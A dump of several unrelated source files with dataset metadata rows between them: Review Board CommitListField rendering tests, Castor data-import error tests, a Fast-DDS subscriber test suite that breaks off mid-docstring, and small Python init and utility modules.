self.assertInHTML(
'<colgroup>'
' <col>'
' <col class="expand-collapse-control">'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th colspan="2">Summary</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="1" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td />'
' <td class="value"><pre>Commit message 2</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td />'
' <td class="value"><pre>New commit message 1</pre></td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="4" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' </tr>'
'</tbody>',
result)
def test_render_change_entry_html_expand_with_author(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter and a multi-line commit
message
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1\n\n'
'A long message.\n',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2\n\n'
'So very long of a message.\n',
author_name=submitter_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML(
'<colgroup>'
' <col>'
' <col class="expand-collapse-control">'
' <col>'
' <col>'
'</colgroup>',
result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th colspan="2">Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="1" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td />'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td />'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td>'
' <a href="#" class="expand-commit-message" '
' data-commit-id="4" aria-role="button">'
' <span class="fa fa-plus" title="Expand commit message." />'
' </a>'
' </td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_render_change_entry_html_with_author_old(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter in the old commits
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name='Example Author')
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name=submitter_name)
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_render_change_entry_html_with_author_new(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter in the new commits
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name='Example Author')
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_serialize_change_entry(self):
"""Testing CommitListField.serialize_change_entry"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name='Example Author')
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
self.assertEqual(
{
'old': [
{
'author': submitter_name,
'summary': 'Commit message 1',
},
{
'author': submitter_name,
'summary': 'Commit message 2',
},
],
'new': [
{
'author': submitter_name,
'summary': 'New commit message 1',
},
{
'author': 'Example Author',
'summary': 'New commit message 2',
},
],
},
field.serialize_change_entry(changedesc))
def _make_field(self, review_request):
request = self.request_factory.get('/')
request.user = AnonymousUser()
data = ReviewRequestPageData(review_request, request)
data.query_data_pre_etag()
data.query_data_post_etag()
return CommitListField(review_request, request=request, data=data)
def _build_review_request_get(self, review_request):
"""Return an HTTP GET request for the review request.
This currently needs to exist because of a Django 1.6 issue. Once we're
on 1.8+ this method can go away.
Args:
review_request (reviewboard.reviews.models.review_request.
ReviewRequest):
The review request being tested.
Returns:
django.http.HttpRequest:
The request for the review request detail page.
"""
# XXX: Django 1.8 includes the resolver_match in test client requests.
url = review_request.get_absolute_url()
request = self.request_factory.get(url)
request.resolver_match = resolve(url)
return request
| 40.97338
| 79
| 0.506907
| 3,322
| 35,401
| 5.177303
| 0.056893
| 0.104308
| 0.018838
| 0.050235
| 0.921856
| 0.906622
| 0.897203
| 0.891854
| 0.888889
| 0.868946
| 0
| 0.006601
| 0.383746
| 35,401
| 863
| 80
| 41.020857
| 0.781766
| 0.062399
| 0
| 0.902158
| 0
| 0
| 0.203042
| 0.064016
| 0
| 0
| 0
| 0
| 0.051799
| 1
| 0.030216
| false
| 0
| 0.011511
| 0
| 0.047482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea84db5c0ee19f64cc65b841a69f8228d924e67
| 140
|
py
|
Python
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 44
|
2021-05-21T14:30:12.000Z
|
2021-12-28T12:52:38.000Z
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 1
|
2021-03-31T16:41:28.000Z
|
2021-03-31T16:41:28.000Z
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 15
|
2021-03-29T13:16:56.000Z
|
2022-03-13T12:49:44.000Z
|
import model_bagel.data
import model_bagel.models
import model_bagel.testing
import model_bagel.utils
from model_bagel.models import Bagel
| 20
| 36
| 0.871429
| 22
| 140
| 5.318182
| 0.363636
| 0.42735
| 0.547009
| 0.376068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092857
| 140
| 6
| 37
| 23.333333
| 0.92126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eab43b64217a0c1d0a3285d9a15b69d188e6d37
| 5,519
|
py
|
Python
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 1
|
2022-02-07T17:49:31.000Z
|
2022-02-07T17:49:31.000Z
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 48
|
2021-08-05T15:20:27.000Z
|
2022-03-28T14:49:25.000Z
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 1
|
2021-08-06T07:06:37.000Z
|
2021-08-06T07:06:37.000Z
|
import pytest
from castoredc_api import CastorException
from castoredc_api.importer.import_data import import_data
class TestImportValidationErrorsAsync:
"""Tests uploading data to Castor."""
def test_import_date_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_date.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_datetime_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_datetime.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_number_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_number.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_numberdate_date_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_numberdate_date.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_numberdate_number_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_numberdate_number.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_optiongroup(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_optiongroup.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_time_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_time.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_year_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_year.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
study_error = (
"Non-viable data found in dataset to be imported. See output folder for details"
)
| 44.152
| 133
| 0.653017
| 682
| 5,519
| 4.920821
| 0.09824
| 0.071514
| 0.061979
| 0.090584
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0
| 0
| 0.274325
| 5,519
| 124
| 134
| 44.508065
| 0.837953
| 0.12013
| 0
| 0.673684
| 0
| 0
| 0.281705
| 0.257173
| 0
| 0
| 0
| 0
| 0.084211
| 1
| 0.084211
| false
| 0
| 0.473684
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eb008f7d48517cfcf8dbd33f50c5a6f05096718
| 104
|
py
|
Python
|
stormspotter/collector/assets/azure/__init__.py
|
ndrix/Stormspotter
|
4e999369d07aa88fc4803bb6e4c92b1ee78f97ef
|
[
"Apache-2.0",
"MIT"
] | 2
|
2020-05-29T21:49:44.000Z
|
2022-02-17T04:09:19.000Z
|
stormspotter/collector/assets/azure/__init__.py
|
avineshwar/Stormspotter
|
8e2f484dfcbed8397cb744d7be9e119a2d4a78fe
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
stormspotter/collector/assets/azure/__init__.py
|
avineshwar/Stormspotter
|
8e2f484dfcbed8397cb744d7be9e119a2d4a78fe
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
import stormspotter.collector.assets.azure.rbac
import stormspotter.collector.assets.azure.azurewrapper
| 34.666667
| 55
| 0.884615
| 12
| 104
| 7.666667
| 0.583333
| 0.391304
| 0.586957
| 0.717391
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 104
| 2
| 56
| 52
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
94c2f42245c78dae479f60e8495f2428a0bab0ab
| 192
|
py
|
Python
|
utils.py
|
kchodorow/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 3
|
2017-03-18T02:47:54.000Z
|
2021-05-13T05:36:38.000Z
|
utils.py
|
Jazielinc/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 1
|
2018-03-23T08:35:54.000Z
|
2018-03-23T08:35:54.000Z
|
utils.py
|
Jazielinc/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 2
|
2018-08-14T16:29:51.000Z
|
2021-05-13T05:36:40.000Z
|
import re
def title_to_filename(title):
title = title.replace(' ', '-')
return re.sub(r'[^-A-Za-z0-9_]', '', title)
def generate_uid(title):
    """Derive a uid from *title* by keeping only word characters [A-Za-z0-9_]."""
    word_chars_only = re.compile(r'[^A-Za-z0-9_]')
    return word_chars_only.sub('', title)
| 21.333333
| 45
| 0.614583
| 32
| 192
| 3.53125
| 0.5
| 0.176991
| 0.19469
| 0.212389
| 0.40708
| 0.40708
| 0.40708
| 0.40708
| 0.40708
| 0
| 0
| 0.024242
| 0.140625
| 192
| 8
| 46
| 24
| 0.660606
| 0
| 0
| 0
| 1
| 0
| 0.151042
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a2099c19e5b60fbd2111926fc4dc28e7c3abde43
| 22,104
|
py
|
Python
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 6
|
2021-12-15T07:52:35.000Z
|
2022-03-17T12:15:06.000Z
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 4
|
2022-02-18T03:21:55.000Z
|
2022-03-29T12:20:53.000Z
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 1
|
2021-12-17T18:14:32.000Z
|
2021-12-17T18:14:32.000Z
|
import fastdds
import pytest
import test_complete
import time
class SubscriberListener(fastdds.SubscriberListener):
    """No-op subscriber listener; the tests only need an instance to attach."""

    def __init__(self):
        super(SubscriberListener, self).__init__()
class DataReaderListener(fastdds.DataReaderListener):
    """No-op data-reader listener; the tests only need an instance to attach."""

    def __init__(self):
        super(DataReaderListener, self).__init__()
@pytest.fixture
def participant_qos():
    """Provide a freshly default-constructed DomainParticipantQos."""
    qos = fastdds.DomainParticipantQos()
    return qos
@pytest.fixture
def not_autoenable_participant_qos(participant_qos):
    """Participant QoS with automatic enabling of created entities switched off."""
    factory_qos = participant_qos.entity_factory()
    factory_qos.autoenable_created_entities = False
    return participant_qos
@pytest.fixture
def participant(participant_qos):
    """Create a DomainParticipant on domain 0 with the given QoS."""
    dpf = fastdds.DomainParticipantFactory.get_instance()
    return dpf.create_participant(0, participant_qos)
@pytest.fixture
def subscriber(participant, topic):
    """
    Subscriber with default QoS on *participant*.

    Teardown deletes the subscriber, the topic and finally the participant
    (child-first) and asserts every deletion succeeds, so a test that leaks
    a datareader makes the fixture itself fail.
    """
    subscriber = participant.create_subscriber(
        fastdds.SUBSCRIBER_QOS_DEFAULT)
    yield subscriber
    # Teardown: entities must be deleted before their parent.
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           participant.delete_subscriber(subscriber))
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           participant.delete_topic(topic))
    factory = fastdds.DomainParticipantFactory.get_instance()
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           factory.delete_participant(participant))
@pytest.fixture
def topic(participant):
    """Register the CompleteTestType on *participant* and create the "Complete" topic."""
    type_support = fastdds.TypeSupport(
        test_complete.CompleteTestTypePubSubType())
    type_name = type_support.get_type_name()
    participant.register_type(type_support, type_name)
    return participant.create_topic(
        "Complete", type_name, fastdds.TOPIC_QOS_DEFAULT)
@pytest.fixture
def test_type():
    """TypeSupport wrapping the CompleteTestType pub/sub type."""
    pubsub_type = test_complete.CompleteTestTypePubSubType()
    return fastdds.TypeSupport(pubsub_type)
@pytest.fixture
def writer_participant():
    """Separate participant (domain 0, default QoS) hosting the writer side."""
    dpf = fastdds.DomainParticipantFactory.get_instance()
    return dpf.create_participant(0, fastdds.PARTICIPANT_QOS_DEFAULT)
@pytest.fixture
def writer_topic(writer_participant, test_type):
    """Register the test type on the writer participant and create its "Complete" topic."""
    type_name = test_type.get_type_name()
    writer_participant.register_type(test_type, type_name)
    return writer_participant.create_topic(
        "Complete", type_name, fastdds.TOPIC_QOS_DEFAULT)
@pytest.fixture
def publisher(writer_participant):
    """Publisher with default QoS on the writer participant."""
    pub = writer_participant.create_publisher(fastdds.PUBLISHER_QOS_DEFAULT)
    return pub
def test_access(subscriber):
    """
    This test checks:
    - Subscriber::begin_access
    - Subscriber::end_access

    Both are currently unsupported by the binding and must report
    RETCODE_UNSUPPORTED.  (The previous docstring mentioned
    ::resume_publications, a copy-paste from a publisher test.)
    """
    assert(fastdds.ReturnCode_t.RETCODE_UNSUPPORTED ==
           subscriber.begin_access())
    assert(fastdds.ReturnCode_t.RETCODE_UNSUPPORTED ==
           subscriber.end_access())
def test_create_datareader(topic, subscriber):
    """
    This test checks:
    - Subscriber::create_datareader
    - Subscriber::delete_datareader
    - DataReader::get_status_mask
    - StatusMask::operator ==
    - StatusMask::operator <<

    All three create_datareader overloads are exercised: (topic, qos),
    (topic, qos, listener) and (topic, qos, listener, status_mask).
    """
    listener = DataReaderListener()
    assert(listener is not None)
    # Overload 1
    datareader = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT)
    assert(datareader is not None)
    assert(datareader.is_enabled())
    # Without an explicit mask the reader reports the all() mask.
    assert(fastdds.StatusMask.all() == datareader.get_status_mask())
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
    # Overload 2
    datareader = subscriber.create_datareader(
        topic, fastdds.DATAREADER_QOS_DEFAULT, listener)
    assert(datareader is not None)
    assert(datareader.is_enabled())
    assert(fastdds.StatusMask.all() == datareader.get_status_mask())
    assert(fastdds.ReturnCode_t.RETCODE_OK ==
           subscriber.delete_datareader(datareader))
    def test(status_mask_1, status_mask_2, listnr=None):
        """
        Test the entity creation using the two types of StatusMasks.

        Creates and deletes one reader per mask spelling; the reader must
        echo back exactly the mask it was created with.
        """
        datareader = subscriber.create_datareader(
            topic, fastdds.DATAREADER_QOS_DEFAULT, listnr, status_mask_1)
        assert(datareader is not None)
        assert(datareader.is_enabled())
        assert(status_mask_1 == datareader.get_status_mask())
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.delete_datareader(datareader))
        datareader = subscriber.create_datareader(
            topic, fastdds.DATAREADER_QOS_DEFAULT, listnr, status_mask_2)
        assert(datareader is not None)
        assert(datareader.is_enabled())
        assert(status_mask_2 == datareader.get_status_mask())
        assert(fastdds.ReturnCode_t.RETCODE_OK ==
               subscriber.delete_datareader(datareader))
    # Overload 3: Different status masks
    # Each pair uses the static-method spelling and the free-function
    # spelling of the same mask; both must behave identically.
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), None)
    test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), listener)
    test(fastdds.StatusMask.none(), fastdds.StatusMask_none(), listener)
    test(fastdds.StatusMask.data_available(),
         fastdds.StatusMask_data_available(), listener)
    test(fastdds.StatusMask.data_on_readers(),
         fastdds.StatusMask_data_on_readers(), listener)
    test(fastdds.StatusMask.inconsistent_topic(),
         fastdds.StatusMask_inconsistent_topic(), listener)
    test(fastdds.StatusMask.liveliness_changed(),
         fastdds.StatusMask_liveliness_changed(), listener)
    test(fastdds.StatusMask.liveliness_lost(),
         fastdds.StatusMask_liveliness_lost(), listener)
    test(fastdds.StatusMask.offered_deadline_missed(),
         fastdds.StatusMask_offered_deadline_missed(), listener)
    test(fastdds.StatusMask.offered_incompatible_qos(),
         fastdds.StatusMask_offered_incompatible_qos(), listener)
    test(fastdds.StatusMask.publication_matched(),
         fastdds.StatusMask_publication_matched(), listener)
    test(fastdds.StatusMask.requested_deadline_missed(),
         fastdds.StatusMask_requested_deadline_missed(), listener)
    test(fastdds.StatusMask.requested_incompatible_qos(),
         fastdds.StatusMask_requested_incompatible_qos(), listener)
    test(fastdds.StatusMask.sample_lost(),
         fastdds.StatusMask_sample_lost(), listener)
    test(fastdds.StatusMask.sample_rejected(),
         fastdds.StatusMask_sample_rejected(), listener)
    test(fastdds.StatusMask.subscription_matched(),
         fastdds.StatusMask_subscription_matched(), listener)
    # Composite mask combined with operator << (free-function spelling)...
    m = fastdds.StatusMask_data_available() << \
        fastdds.StatusMask_data_on_readers() << \
        fastdds.StatusMask_inconsistent_topic() << \
        fastdds.StatusMask_liveliness_changed() << \
        fastdds.StatusMask_liveliness_lost() << \
        fastdds.StatusMask_offered_deadline_missed() << \
        fastdds.StatusMask_offered_incompatible_qos() << \
        fastdds.StatusMask_publication_matched() << \
        fastdds.StatusMask_requested_deadline_missed() << \
        fastdds.StatusMask_requested_incompatible_qos() << \
        fastdds.StatusMask_sample_lost() << \
        fastdds.StatusMask_sample_rejected() << \
        fastdds.StatusMask_subscription_matched()
    # ...checked against the same chain built from the static methods.
    test(fastdds.StatusMask.data_available() <<
         fastdds.StatusMask.data_on_readers() <<
         fastdds.StatusMask.inconsistent_topic() <<
         fastdds.StatusMask.liveliness_changed() <<
         fastdds.StatusMask.liveliness_lost() <<
         fastdds.StatusMask.offered_deadline_missed() <<
         fastdds.StatusMask.offered_incompatible_qos() <<
         fastdds.StatusMask.publication_matched() <<
         fastdds.StatusMask.requested_deadline_missed() <<
         fastdds.StatusMask.requested_incompatible_qos() <<
         fastdds.StatusMask.sample_lost() <<
         fastdds.StatusMask.sample_rejected() <<
         fastdds.StatusMask.subscription_matched(),
         m,
         listener)
def test_create_datareader_with_profile(topic, subscriber):
    """
    This test checks:
    - Subscriber::create_datareader_with_profile
    - Subscriber::delete_datareader
    - DataReader::get_qos
    - DataReader::get_status_mask
    - StatusMask::operator ==
    - StatusMask::operator <<

    The XML profile 'test_datareader_profile' configures RELIABLE
